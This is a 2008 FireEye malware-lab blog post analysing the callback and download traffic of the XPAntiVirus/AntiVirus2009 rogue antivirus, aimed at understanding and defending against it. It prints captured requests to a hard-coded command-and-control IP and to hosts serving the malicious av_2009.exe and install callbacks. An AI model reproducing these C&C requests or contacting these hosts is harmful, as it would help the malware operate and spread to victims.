FireEye Malware Intelligence Lab

First up to bat is XPAntiVirus, which has a ton of different names, but is basically the same software as yesterday.  It's your basic Rogue that sends you fake alerts to entice you to buy yet another Rogue.

Lots of people talk about the sample itself, or maybe even where it's hosted, but no one is talking about its callback features!  Here you can see XPAntiVirus calling home and receiving instructions - encrypted of course.  I rewrote most of the string as I'm sure it has information about my lab.  At first glance it looks similar to base64, and may very well be base64 encoding on top, but underneath there is some sort of encryption as well.  I plan to investigate the encryption more later.

As you see below, 208.72.169.114, a McColo IP, is being used for the callback. 

GET /cset.php?id=g/kjlk12nioJIONa3n23rlk23r/1n512KJOSIDFn/klj239nIOQPne23na97235/kl1391EIO+knla290hjgaqiSDFIOn+lkjj1290ganslkHJLKHFGSDiopqpoQU931/nkls111asdfSDFKL13n/kl1jklj23rj2JFLSDKJOIUEW801241HNasdfas3huhAFsd= HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: XML
Host: 208.72.169.114
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 27 Oct 2008 01:01:01 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 27 Oct 2008 01:01:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/xml; charset=UTF-8

3c8
z+kljlk12kFALKSFFFF31nlk1jlk13jklas+/kljasd9012DFJWQIO31nfweIDF+jkl1299132rJKLJ231hsdf/jlk12FAW29jsd/hjkhasdf121hkFIEOE/MNIjseWQhjsdio319ndDDFi/jlk1dsf31SD+KQIEnio1/jklsf3nDDSF/klj192fDFAiqnq/B9+j121FDSioAaWE/dsf129102jnfEQ/f12lk12jFDSFE/qwopir3212jJHewklE/jklasdfJSSSQnwei18sDE==
0

After the above HTTP GET to cset.php is issued, a GET to uget.php happens. You'll notice that there is no response, other than essentially an ACK from the server.  A simple hypothesis is that the Bot checks in with some unique identifiers, the C&C requests some more data, the Bot sends it, and the transaction finishes.

GET /uget.php?id=eniDWI1211ni12Fds90E+sdqiUHQ13h8asdD+sdf21iHOA/h1o887912FDSFEjfewo231jJIj3h+sdf90hUWqni31n+jiko1239FSD/jioE90321hsdf9weiho31/sdiiii217sdfIIOSUD+dfsio34EFDSjioSDjFIo HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: XML
Host: 208.72.169.114
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 27 Oct 2008 03:31:44 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

0

You'll notice that the IP is hard coded in the HTTP header.  There's lots of noise about fast flux these days, but in all the McColo based Botnets, all the communication uses hard coded IPs. 

What AntiVirus2009/XPAntiVirus is currently using fast flux for is for the download of the malicious binaries.  For instance, here is a download for "AntiVirus2009" from yesterday:

GET /download/av_2009.exe HTTP/1.1
Range: bytes=0-
Unless-Modified-Since: Mon, 27 Oct 2008 10:09:00 GMT
If-Range: "2184994-134600-45a3951de4700"
Host: expressdataupdate.com

Yesterday, this host resolved to 208.72.169.100, a McColo IP.  Today, though, it's 89.149.251.56.  These guys seem to have some good information on this - http://ddanchev.blogspot.com/2008/10/diverse-portfolio-of-fake-security_28.html

Interestingly, for the same piece of software, the initial call back that happened on install remains with the old IP (this still revoles to 208.72.169.100 at time of writing):

GET /firstrun.php?product=AV9&aff=[blocked]&update=2409av9nv&time=01:01:01%20AM HTTP/1.1
User-Agent: Mozilla
Host: secureupdateservice.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 27 Oct 2008 15:29:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Content-Length: 6
Content-Type: text/html

error

Alex Lanstein @ FireEye Malware Intelligence Labs
Comments/Questions to fgong@fireeye.com